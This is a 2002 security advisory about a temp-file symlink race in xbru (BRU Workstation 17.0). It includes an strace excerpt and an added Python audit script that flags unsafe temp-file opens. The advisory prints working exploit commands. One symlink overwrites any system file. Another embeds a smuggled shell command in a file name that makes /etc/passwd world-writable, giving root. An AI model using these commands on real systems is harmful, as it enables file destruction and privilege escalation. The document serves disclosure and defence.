prophecy_at_prophecy.net.nz
Date: Thu Sep 12 2002 - 19:08:16 CDT


    Backup / Restore Utility [BRU]
    ------------------------------

    advisory_at_prophecy.net.nz - 04/09/02

    About:
      - http://www.tolisgroup.com/
      - "BRU Workstation 17.0 Backup & Restore Utility is a functionally-rich
        backup solution designed for commercial networked systems when the
        client/server capability of BRU-Pro is more than you need. Available
        to support a multitude of platforms, BRU Workstation protects data
        via NFS, AFS, SMB, and NetAtalk mounted filesystems."

    Problem:
      - Race condition in xbru component.

    Versions Tested:
      - 17.0 (Workstation Edition)

    Exploit:
      - Confirmed testing that this vulnerability can be used to clobber any
        system file:
        ln -s /file/to/clobber /tmp/xbru_dscheck.dd
      - Confirmed testing that this vulnerability can be used to obtain root
        via spybreak's logwatch method (and possibly others):
        ln -s /etc/log.d/scripts/logfiles/xferlog/'`cd etc;chmod 666 passwd #`' /tmp/xbru_dscheck.dd

    Notes:
      - Wait for root to navigate through xbru to 'list archive contents'.
        (a tape must be present in the tape drive for this to work).

    Fix:
      - No response from vendor: (support_at_tolisgroup.com)

    Note: This is a new discovery, not the same as:
    http://online.securityfocus.com/bid/3970
    but contained within the same product.
    Unfortunately it seems that a fix was never released for this previous
    race condition either.

    Strace Snippet:

    [pid 32159] execve("/bin/dd", ["dd", "if=/dev/nst0", "of=/tmp/xbru_dscheck.dd", "bs=32k", "count=1"], [/* 38 vars */]) = 0
    [pid 32159] open("/tmp/xbru_dscheck.dd", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 1
    <snip>
    [pid 32151] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
    <snip>
    [pid 32161] execve("/bin/dd", ["dd", "if=/tmp/xbru_dscheck.dd", "count=1", "bs=216"], [/* 38 vars */]) = 0
    [pid 32161] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 0
    <snip>
    [pid 32162] execve("/bin/bru", ["bru", "-gB", "-b4k", "-f", "/tmp/xbru_dscheck.dd"], [/* 38 vars */]) = 0
    [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
    [pid 32163] execve("/usr/local/xbru/mounttape.tcl", ["/usr/local/xbru/mounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "0"], [/* 39 vars */]) = 0
    [pid 32163] execve("/usr/bin/wish", ["/usr/bin/wish", "/usr/local/xbru/mounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "0"], [/* 39 vars */]) = 0
    [pid 32162] access("/tmp/xbru_dscheck.dd", F_OK) = 0
    [pid 32162] access("/tmp/xbru_dscheck.dd", R_OK) = 0
    [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
    [pid 32162] access("/tmp/xbru_dscheck.dd", R_OK) = 0
    [pid 32162] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 3
    [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
    [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
    [pid 32162] stat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
    [pid 32167] execve("/usr/local/xbru/unmounttape.tcl", ["/usr/local/xbru/unmounttape.tcl", "/tmp/xbru_dscheck.dd", "1", "g", "4"], [/* 39 vars */]) = 0
    [pid 32151] lstat64("/tmp/xbru_dscheck.dd", {st_mode=S_IFREG|0644, st_size=32768, ...}) = 0
    [pid 32151] unlink("/tmp/xbru_dscheck.dd") = 0
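
An added example, not part of the original advisory and not vendor code: a Python audit that scans strace output for the pattern visible in the trace above, a file created under a world-writable directory with O_CREAT but without O_EXCL, so the write lands wherever a pre-existing symlink points. The sample input is copied from the first records of the advisory's trace (still hard-wrapped as mailed); the function names and the list of shared directories are assumptions.

```python
import re

# Directories any local user can write to, where a fixed file name can be pre-planted.
SHARED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Matches strace records such as: [pid 1] open("/tmp/x", O_WRONLY|O_CREAT, 0666) = 1
OPEN_RE = re.compile(
    r'(?:\[pid\s+(?P<pid>\d+)\]\s+)?open(?:at|64)?\('
    r'(?:AT_FDCWD,\s*)?"(?P<path>[^"]+)",\s*(?P<flags>[A-Z_|0-9]+)'
)

# Sample input: first records of the advisory's strace snippet, wrapped as in the mail.
SAMPLE = """\
[pid 32159] execve("/bin/dd", ["dd", "if=/dev/nst0",
"of=/tmp/xbru_dscheck.dd", "bs=32k", "count=1"], [/* 38 vars */]) = 0
[pid 32159] open("/tmp/xbru_dscheck.dd",
O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 1
<snip>
[pid 32161] open("/tmp/xbru_dscheck.dd", O_RDONLY|O_LARGEFILE) = 0
"""

def join_wrapped(text):
    """Re-join strace records that were hard-wrapped across several lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line == "<snip>":
            continue
        if line.startswith("[pid") or not records:
            records.append(line)          # start of a new record
        else:
            records[-1] += " " + line     # continuation of the previous one
    return records

def unsafe_temp_opens(text):
    """Return open() calls that create a file in a shared directory without O_EXCL."""
    findings = []
    for rec in join_wrapped(text):
        m = OPEN_RE.search(rec)
        if not m or not m.group("path").startswith(SHARED_DIRS):
            continue
        flags = set(m.group("flags").split("|"))
        # O_CREAT without O_EXCL reuses whatever already exists at the path.
        if "O_CREAT" in flags and "O_EXCL" not in flags:
            findings.append({"pid": m.group("pid"), "path": m.group("path"),
                             "follows_symlink": "O_NOFOLLOW" not in flags,
                             "truncates": "O_TRUNC" in flags})
    return findings

if __name__ == "__main__":
    for finding in unsafe_temp_opens(SAMPLE):
        print(finding)
```

A program that creates its scratch file with mkstemp(3), or with open() using O_CREAT|O_EXCL on an unpredictable name, produces no findings here.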